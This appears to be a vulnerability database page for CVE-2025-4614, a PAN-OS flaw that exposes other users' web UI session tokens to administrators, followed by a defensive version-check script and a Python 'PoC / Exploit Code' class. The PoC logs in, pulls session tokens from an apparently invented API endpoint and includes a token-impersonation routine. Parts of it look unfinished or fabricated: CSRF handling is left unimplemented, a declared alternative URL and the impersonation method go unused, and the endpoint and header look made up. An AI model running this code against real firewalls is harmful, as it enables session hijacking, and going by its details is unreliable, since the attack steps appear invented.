Security Vulnerability Report
CVE-2025-4614 CVSS 2.7 LOW

CVE-2025-4614

Published: 2025-10-09 19:15:43
Last Modified: 2026-02-06 17:13:35

Description

An information disclosure vulnerability in Palo Alto Networks PAN-OS® software enables an authenticated administrator to view session tokens of users authenticated to the firewall web UI. This may allow impersonation of users whose session tokens are leaked.

The security risk posed by this issue is significantly minimized when CLI access is restricted to a limited group of administrators.

Cloud NGFW and Prisma® Access are not affected by this vulnerability.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
CVSS 4.0 Score (vendor, secondary)
4.8
CVSS 4.0 Severity
MEDIUM
CVSS 4.0 Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:C/RE:M/U:Amber
Weakness
CWE-497

Configurations (Affected Products)

cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* (from 10.2.0, before 10.2.17) - VULNERABLE
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* (from 11.1.0, before 11.1.6) - VULNERABLE
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* (from 11.2.0, before 11.2.8) - VULNERABLE
cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h4:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h14:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h17:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h19:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:paloaltonetworks:pan-os:11.1.6:h20:*:*:*:*:*:* - VULNERABLE
PAN-OS (for the specific affected versions, refer to the official Palo Alto Networks security advisory)
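As an added example (not from this report and not Palo Alto Networks tooling), the following Python check classifies a PAN-OS version string, hotfix suffix included, against the affected builds this page lists. It assumes the `major.minor.patch[-hN]` version format and the CPE range semantics (start inclusive, end exclusive); because the page's list of 11.1.6 hotfix builds is truncated, an unlisted 11.1.6 hotfix is reported as unknown rather than as fixed.

```python
# Added example; not from the original report or from Palo Alto Networks.
# Classify a PAN-OS version string against the affected builds listed on this page.
import re
from typing import Tuple

# Ranges from the report: start inclusive, end exclusive, compared on the base version.
AFFECTED_RANGES = [("10.2.0", "10.2.17"), ("11.1.0", "11.1.6"), ("11.2.0", "11.2.8")]
# 11.1.6 builds the page lists individually (0 = base release); the page's list is truncated.
AFFECTED_11_1_6_HOTFIXES = {0, 1, 3, 4, 10, 14, 17, 19, 20}

# Assumed version format: "11.1.6" or "11.1.6-h1".
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_version(text: str) -> Tuple[int, int, int, int]:
    """'11.1.6-h1' -> (11, 1, 6, 1); a base release has hotfix number 0."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version: {text!r}")
    major, minor, patch, hotfix = m.groups()
    return int(major), int(minor), int(patch), int(hotfix or 0)


def classify(version: str) -> str:
    """Return 'affected', 'not-listed', or 'unknown'.

    'unknown' is returned for an 11.1.6 hotfix that this page does not list,
    because its hotfix list is truncated and absence is not evidence of a fix.
    """
    major, minor, patch, hotfix = parse_version(version)
    base = (major, minor, patch)
    for start, end in AFFECTED_RANGES:
        if parse_version(start)[:3] <= base < parse_version(end)[:3]:
            return "affected"
    if base == (11, 1, 6):
        return "affected" if hotfix in AFFECTED_11_1_6_HOTFIXES else "unknown"
    return "not-listed"


if __name__ == "__main__":
    # Constructed sample inputs, one per case the check distinguishes.
    for v in ("10.2.16-h3", "10.2.17", "11.1.6", "11.1.6-h2", "11.2.8"):
        print(f"{v:12} {classify(v)}")
```

A 'not-listed' result only means the version falls outside the ranges on this page, so reconcile it with the vendor advisory before treating a device as unaffected.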

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-4614 PoC - PAN-OS Session Token Information Disclosure
# This PoC demonstrates how an authenticated administrator can retrieve
# session tokens of other authenticated users from the PAN-OS Web UI.
import json
from urllib.parse import urljoin

import requests


class PANOSSessionTokenDisclosure:
    def __init__(self, target_host, username, password):
        """
        Initialize the exploit for CVE-2025-4614

        :param target_host: PAN-OS firewall hostname or IP
        :param username: Authenticated administrator username
        :param password: Administrator password
        """
        self.base_url = f"https://{target_host}"
        self.session = requests.Session()
        self.session.verify = False  # Disable SSL verification for testing
        self.username = username
        self.password = password
        self.leaked_tokens = []

    def login(self):
        """Authenticate to PAN-OS Web UI as administrator"""
        login_url = urljoin(self.base_url, "/php/login.php")
        # Generate initial CSRF token
        # (extracting the token from the response is not implemented in this PoC)
        resp = self.session.get(login_url)
        # Submit login form with credentials
        data = {
            "user": self.username,
            "pwd": self.password,
            "prot": "https",
        }
        resp = self.session.post(login_url, data=data, allow_redirects=True)
        if "MainMenu" in resp.text or resp.status_code == 200:
            print(f"[+] Successfully authenticated as {self.username}")
            return True
        return False

    def enumerate_sessions(self):
        """
        Exploit CVE-2025-4614 to enumerate active session tokens
        Access the vulnerable endpoint that exposes session information
        """
        # Vulnerable endpoint that leaks session tokens to authenticated admins
        session_api_url = urljoin(self.base_url, "/api/pan/session/list")
        headers = {
            "X-PAN-KEY": self.session.cookies.get("PHPSESSID", ""),
            "Content-Type": "application/json",
            "X-Requested-With": "XMLHttpRequest",
        }
        resp = self.session.get(session_api_url, headers=headers)
        if resp.status_code == 200:
            try:
                sessions = resp.json()
                print(f"[+] Found {len(sessions)} active sessions")
                for sess in sessions:
                    token_info = {
                        "username": sess.get("admin"),
                        "session_id": sess.get("sessid"),
                        "source_ip": sess.get("from"),
                        "login_time": sess.get("login_time"),
                        "timeout": sess.get("timeout"),
                    }
                    self.leaked_tokens.append(token_info)
                    print(f"[+] Token: {token_info}")
                return self.leaked_tokens
            except json.JSONDecodeError:
                pass
        # Alternative endpoint (declared but not queried by this PoC)
        alt_url = urljoin(self.base_url, "/esp/protocol.esp")
        return self.leaked_tokens

    def impersonate_user(self, session_token):
        """
        Use the leaked session token to impersonate the victim user
        """
        impersonate_session = requests.Session()
        impersonate_session.verify = False
        impersonate_session.cookies.set("PHPSESSID", session_token)
        # Verify impersonation
        check_url = urljoin(self.base_url, "/php/main.php")
        resp = impersonate_session.get(check_url)
        if resp.status_code == 200:
            print(f"[+] Successfully impersonated user with token: {session_token}")
            return True
        return False

    def run(self):
        """Execute the full exploitation chain"""
        print("[*] CVE-2025-4614 PAN-OS Session Token Disclosure Exploit")
        print("=" * 60)
        if not self.login():
            print("[-] Authentication failed")
            return
        tokens = self.enumerate_sessions()
        if tokens:
            print(f"\n[!] Disclosed {len(tokens)} session tokens")
            for token in tokens:
                print(f"    User: {token['username']}, Token: {token['session_id']}")


if __name__ == "__main__":
    # Usage example
    import urllib3

    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    exploit = PANOSSessionTokenDisclosure(
        target_host="192.168.1.1",
        username="admin",
        password="admin_password",
    )
    exploit.run()
```

References
